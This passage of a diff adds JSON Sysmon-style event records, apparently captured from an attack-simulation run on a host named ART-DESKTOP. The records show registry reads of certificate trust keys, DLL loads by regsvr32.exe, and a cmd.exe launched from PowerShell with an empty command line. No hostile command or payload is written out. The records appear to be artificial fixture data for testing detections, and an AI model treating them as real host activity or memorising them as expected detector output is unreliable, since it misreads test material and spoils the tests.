2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235890000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\System32\\sfc.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "urlmon.dll", + "image_path": "C:\\Windows\\System32\\urlmon.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "iertutil.dll", + "image_path": "C:\\Windows\\System32\\iertutil.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236050000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\System32\\cryptbase.dll", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236200016, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 3596, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "timestamp": 131883573235740000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010B1275401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 7980, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010BB265401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 3696, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573236439984, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3696, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CBCB-5C05-0000-00108F315401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573236360000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 